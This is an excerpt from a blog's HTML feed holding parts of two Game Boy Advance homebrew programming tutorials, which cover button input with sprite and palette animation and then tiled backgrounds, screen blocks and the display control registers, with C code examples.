<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">10</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">keys</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">idx</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x602F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0xC04F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="n">idx</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And then move the sprite off screen when we don’t want to draw any text at all:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">ClearSprite</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x60AF</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<h2 id="animating-palette-information">Animating Palette Information</h2>
<p>In addition to drawing a sprite, let’s animate our background. You’ll notice that the background I created earlier was just a single colour. Since the colours live in palette memory, we can change the colour of the background just by changing the first colour in the background palette.</p>
<p>To make things simpler, I just added the code to change the background colour ot the DrawSprite function from above. There are certainly better / cleaner ways to do this, but for a quick and dirty example, I think the following will do.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">DrawSprite</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">const</span> <span class="n">uint16</span> <span class="n">bgCols</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">RGB15</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">RGB15</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">16</span><span class="p">),</span>
<span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">16</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span>
<span class="n">RGB15</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">16</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">32</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">32</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span>
<span class="n">RGB15</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">32</span><span class="p">)};</span>
<span class="n">MEM_BG_PALETTE</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">bgCols</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>Finally, I added a single line to the ClearSprite function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">ClearSprite</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">MEM_BG_PALETTE</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You can do a lot of interesting things by modifying palettes directly, like having parts of sprites flash when hit, or having different enemies use the same sprite but use different colours (like the old Legend of Zelda games did with red / blue enemies). What I’ve done here is the simplest possible example of doing something like that, but it’s effective nonetheless.</p>
<h2 id="putting-it-all-together">Putting It All Together</h2>
<p>If you’re still with me, the hard part is over, and all that’s left is to write out the main function for our program, and make sure all the necessary #defines are there for things to work together.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//previous code from article omitted for brevity</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
#define BACKGROUND_0 0x0100
#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
#define REG_VCOUNT *((volatile uint16*)(0x04000006))
</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">vsync</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o">>=</span> <span class="mi">160</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o"><</span> <span class="mi">160</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">CreateBackground</span><span class="p">();</span>
<span class="n">LoadTileData</span><span class="p">();</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">ClearSprite</span><span class="p">();</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="k">const</span> <span class="n">uint16</span> <span class="n">keys</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="n">KEY_A</span><span class="p">,</span> <span class="n">KEY_B</span><span class="p">,</span> <span class="n">KEY_SELECT</span><span class="p">,</span>
<span class="n">KEY_START</span><span class="p">,</span> <span class="n">KEY_RIGHT</span><span class="p">,</span> <span class="n">KEY_LEFT</span><span class="p">,</span>
<span class="n">KEY_UP</span><span class="p">,</span> <span class="n">KEY_DOWN</span><span class="p">,</span> <span class="n">KEY_L</span><span class="p">,</span> <span class="n">KEY_R</span><span class="p">};</span>
<span class="n">ClearSprite</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">10</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">keys</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span>
<span class="p">{</span>
<span class="n">DrawSprite</span><span class="p">(</span><span class="n">keys</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you want to grab a fully put-together, runnable version of the code, you can find it <a href="https://github.com/khalladay/GBA-By-Example/tree/master/3-UserInput">here</a>, I’m going to omit it here because all the code is already available on this page, and I think a github repo is a far better delivery mechanism for that much code than pasting it here.</p>
<p>This has the disadvantage of only showing one key press at a time (and prioritizing some keys over others), but I’m ok with that, I just wanted a fun example program to show off input handling, and to provide more examples of how to use stuff we’ve done in articles past. I suppose modifying the above to show all the buttons that are currently pressed instead of one is left as an exercise to the reader? ;)</p>
<h2 id="conclusion">Conclusion</h2>
<p>That’s it for this week! I’m kind of excited that we’ve covered enough ground that I can throw up some code and refer to previous articles instead of having to explain every line, but if that ended up being unclear today make sure to let me know via reddit or <a href="https://twitter.com/khalladay">twitter</a>, or wherever so I can adjust future articles.</p>
<p>Finally, As much fun as pumping these articles out every week is, I’m going to slow down a bit and do one every two weeks , so that I have more time for some other hobby projects. We’ve covered enough ground now that there’s no reason to wait around for me to post more before starting to build the GBA game of your dreams though, so get to it!</p>
<p>And as always, if you want to say hello, or ask questions, or point out mistakes I’ve made, I’m most easily reached <a href="https://twitter.com/khalladay">on Twitter</a>.</p>
GBA By Example - Drawing and Moving Backgrounds2017-04-11T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/04/11/GBA-By-Example-3<p>(Note: This is Part 3 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p>It’s Tuesday, which means it’s the arbitrary day of the week I chose to post GBA stuff!</p>
<p><a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">Last week</a> we got a sprite on the screen and moving around in a tiled video mode, but it still left our screen looking a little bit bare. This week we’re going to rectify that, and figure out how to work with <strong>Backgrounds</strong>! You can make really great looking stuff with backgrounds, or you can do what I did, and make something that looks like this:</p>
<div align="center">
<img src="/images/post_images/2017-04-11/bgscroll.gif" /><br />
</div>
<p>This is two backgrounds (one gradient, and one checkerboard), overlapping one another, and moving in opposite directions. Snazzy eh? Today we’re going to cover the absolute minimum you need to know to make something like that.</p>
<p>To kick things off, let’s take a look at what a background actually is on the GBA:</p>
<h2 id="introducing-backgrounds">Introducing Backgrounds</h2>
<p>Like Sprites, Backgrounds are rectangular collections of tiles. Unlike Sprites, they can be really, really big (relatively speaking). If you recall from last week, the largest sprite we can make is 64x64 pixels. Backgrounds can be up to 1024x1024 if we want them to. Since we only have 96k of VRAM on the GBA (and 32k of that is for Sprites), it stands to reason that to fit all our background data in, they look a bit different from Sprites in memory.</p>
<p>Just like with Sprites, all colours in a Background come from a Palette, which is a collection of up to 256 different colours, each stored as a 16 bit unsigned integer. Colours on the GBA are stored with 5 bits per channel, with the highest bit ignored, like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>In code, a Palette might be defined like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">bgPal</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x4DA0</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0xFFFF</span><span class="p">,</span><span class="mh">0x001F</span>
<span class="p">};</span></code></pre></figure>
<p>One thing that hasn’t been mentioned in previous articles is that pixels that use the colour at index 0 are treated as transparent, so you only see the index 0 colour if nothing else gets drawn on top of that pixel. This will be important for us today because we’re going to overlap two backgrounds on top of each other.</p>
<p>A Background’s tiles are the same as a Sprite’s: 8x8 rectangular collections of indices, with each of these storing an index from the palette array. Backgrounds use a separate colour palette from sprites, so you can use an entirely different set of colours for your backgrounds than you do for other stuff in your game. This palette memory, just like with sprites, is large enough to store 256 colours. Since we can only have 256 possible values, tiles store each pixel as an 8 bit index. Tiles are laid out row by row, from top to bottom.</p>
<p>In code, that might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">bgTiles</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span><span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span><span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span><span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span>
<span class="p">...</span>
<span class="p">};</span></code></pre></figure>
<p>If you store your tile data in values larger than uint8s, like I did above, remember that the lowest byte in a value is the leftmost pixel.</p>
<p>All of that should be familiar to you if you read <a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">last week’s post</a>, but unlike with Sprites, the order of the tiles doesn’t matter when we’re working with backgrounds. This is because backgrounds want to re-use tiles as much as possible. To accomplish this, backgrounds use a third data structure, called a <em>Screen Block</em>, which is a collection of indices into tile memory: One 16 bit value for every 8x8 tile that the background uses.</p>
<p>Screen Blocks are always 32x32 in size, but each of these values represents an 8x8 tile, meaning that backgrounds are made up of one or more blocks of 256x256 pixels.</p>
<p>In code, a Screen Block might look something like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">checkerBg</span><span class="p">[</span><span class="mi">1024</span><span class="p">]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x0001</span><span class="p">,</span><span class="mh">0x0001</span><span class="p">,</span><span class="mh">0x0001</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x000A</span><span class="p">,</span><span class="mh">0x001D</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="c1">//continue for another 30 rows</span></code></pre></figure>
<p>As seen here, Screen Blocks are defined row by row, top to bottom, each value representing the index of a tile. When you’re working with 8bpp tiles, this is all there is to it. There’s more to think about in 4bpp mode, but since this is the first time we’re doing anything with bacgkrounds, let’s keep it simple and continue working in 8bpp mode.</p>
<p>The last thing to know is that we can only have between 0 and 4 backgrounds working at the same time. Yay hardware limitations!</p>
<p>This was a lot of theory, and I want to switch gears now and start to build some stuff, but just to recap:</p>
<ul>
<li>A Background is a rectangular collection of 8x8 tiles</li>
<li>Tiles are stored as arrays of indices into palette memory</li>
<li>To decide which tile goes where, Backgrounds use Screen Blocks, which are 32x32 arrays of indices into tile memory</li>
<li>A Background consists of one or more Screen Blocks</li>
<li>We can use between 0 and 4 backgrounds at any given time</li>
</ul>
<p><br />
Alright, let’s start putting this into practice!</p>
<h2 id="my-data">My Data:</h2>
<p>Because Screen Blocks are so large, I’ve uploaded the data (including tiles and palette) that I’m going to use today <a href="https://gist.github.com/khalladay/5d292b8d4ee7668c461821079072300d">to github</a> instead of just including it here.</p>
<p>That gist contains all the information needed to get our first background (the checkerboard) onto the screen. We’ll generate the gradient background in code below.</p>
<h2 id="getting-data-into-vram">Getting Data into VRAM</h2>
<p>We know what our data is going to look like, but we haven’t yet covered where it’s going to go. Let’s start with Palette memory, since it’s going to be the most like what we’ve done before.</p>
<p>As mentioned above, Backgrounds use a different palette than Sprites, which naturally means that the background palette is located at a different place in memory:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "tiles.h"
</span>
<span class="cp">#define MEM_BG_PALETTE ((uint16*)(0x05000000))
#define MEM_OBJ_PALETTE ((uint16*)(0x05000200))
</span>
<span class="kt">void</span> <span class="nf">UploadPaletteMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_BG_PALETTE</span><span class="p">,</span> <span class="n">bgPal</span><span class="p">,</span> <span class="n">bgPalLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Perfect, the palette data was easy! Next we need to get our tiles into memory. You may recall from <a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">last week</a> that the data for sprite tiles starts at the fifth tile-block in tile memory. This is because the first 4 of those blocks are reserved for backgrounds. So let’s put our tile data into the first one:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="n">uint16</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000)
</span>
<span class="kt">void</span> <span class="nf">UploadTileMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span> <span class="n">bgTiles</span><span class="p">,</span> <span class="n">bgTilesLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>All of this is almost identical to last week, so let’s start doing something different and get our Screen Block data into memory. Screen blocks share memory with Tile memory. A Screen Block is 2048 bytes, which means that we can fit 8 of them into a single tile-block. It’s up to us to make sure that we don’t try to put a Screen Block and tile data into the same spot in memory.</p>
<p>If you’re using the example data, you’ll notice that we only have 2 tiles to upload into memory (a checkerboard tile, and a transparent tile), so it’s safe for us to just go 1 Screen Block away from the start of VRAM:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="n">uint16</span> <span class="n">ScreenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="cp">#define MEM_SCREENBLOCKS ((ScreenBlock*)0x6000000)
</span>
<span class="kt">void</span> <span class="nf">UploadScreenBlock</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//checkerBg is the ScreenBlock data from the gist</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">checkerBg</span><span class="p">,</span> <span class="n">checkerBgLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>That should about do it for uploading the data we have for our tiles, but I also mentioned that I generated the gradient background in code. Here’s the code for that:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">GenerateGradient</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//we've uploaded 4 colours to palette memory</span>
<span class="c1">//so make sure we don't overwrite those</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="o">*</span><span class="p">((</span><span class="n">uint16</span><span class="o">*</span><span class="p">)(</span><span class="n">MEM_BG_PALETTE</span><span class="o">+</span><span class="p">(</span><span class="mi">4</span><span class="o">+</span><span class="n">i</span><span class="p">)))</span> <span class="o">=</span> <span class="n">MakeCol</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//every tile is 64 palette indices</span>
<span class="c1">//we have 32 grayscale values from above</span>
<span class="n">uint8</span> <span class="n">tile</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="mi">64</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">tile</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="mi">4</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="n">i</span><span class="p">],</span> <span class="n">tile</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//generate 2 screen blocks,</span>
<span class="c1">//each gray value getting two tiles of width</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">block</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">block</span> <span class="o"><</span> <span class="mi">2</span><span class="p">;</span> <span class="o">++</span><span class="n">block</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">uint16</span> <span class="n">screenBlock</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="c1">//screen block data is row by row, top to bottom</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="n">uint16</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="mi">32</span><span class="p">;</span> <span class="o">++</span><span class="n">j</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//each block gets 16 colours, 2 tiles wide for each</span>
<span class="n">screenBlock</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">+</span> <span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="n">block</span><span class="o">*</span><span class="mi">16</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="n">block</span><span class="o">+</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">screenBlock</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">2048</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>I was torn on whether or not to include this in the post, but I think it’s a good example of another way of working with all the types of memory we’re wrangling to get data on the screen. It also gives us an opportunity to work with a background that uses more than 1 Screen Block, since the gradient is 2 Screen Blocks wide.</p>
<p>If the above code is unclear, that’s ok! I don’t think it was particularly common to generate background data like this anyway. If you want to follow along, just copy and paste the above code and pretend we uploaded that data the same way we did the other data, since it has nothing to do with understanding how the GBA handles backgrounds.</p>
<h2 id="turning-things-on">Turning Things On</h2>
<p>The hard part is officially over! All that’s left now is to tell the hardware to use the data we’re feeding it, and glue all the snippets we have together.</p>
<p>Let’s talk about our friend the display control register (0x04000000), in addition to doing things like setting a video mode, or enabling objects, this value is also used to enable or disable backgrounds.</p>
<p>We get to work with up to four backgrounds at a time on the GBA, and you can enable them like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define VIDEOMODE_0 0x0000
#define BACKGROUND_0 0x0100
#define BACKGROUND_1 0x0200
#define BACKGROUND_3 0x0400
#define BACKGROUND_4 0x0800
</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">BACKGROUND_1</span><span class="p">;</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We’re only going to use the first two backgrounds today, but you can turn on all four backgrounds, or only 1 and 3, or any other combination that you want to use.</p>
<p>Also, we’re still in VideoMode_0, this is because it’s the easiest tiled mode to understand, and we (I) still don’t know enough to actually use any of the features in the other tiled modes.</p>
<p>If you’re in a bitmap mode, you need to enable Background 2 in order for anything to appear on the screen, but as far as I know, you can’t actually do anything with it, it’s just a flag needed to make bitmap modes work.</p>
<h2 id="defining-our-backgrounds">Defining Our Backgrounds</h2>
<p>Just like with Sprites (err.. Objects that is), we need to set up a few values to define how the hardware should use our background data. Mercifully, backgrounds are actually much easier to work with than Sprites. They only need a single 16 bit value set.</p>
<p>Since there are only 4 backgrounds, these bits are at constant memory locations:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_BG0_CONTROL *((volatile uint16*)(0x04000008))
#define REG_BG1_CONTROL *((volatile uint16*)(0x0400000A))
#define REG_BG2_CONTROL *((volatile uint16*)(0x0400000C))
#define REG_BG3_CONTROL *((volatile uint16*)(0x0400000E))</span></code></pre></figure>
<p>What each bit in these values means is as follows:</p>
<div align="center">
<table style="border:1px solid black; width=600px; padding:2px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
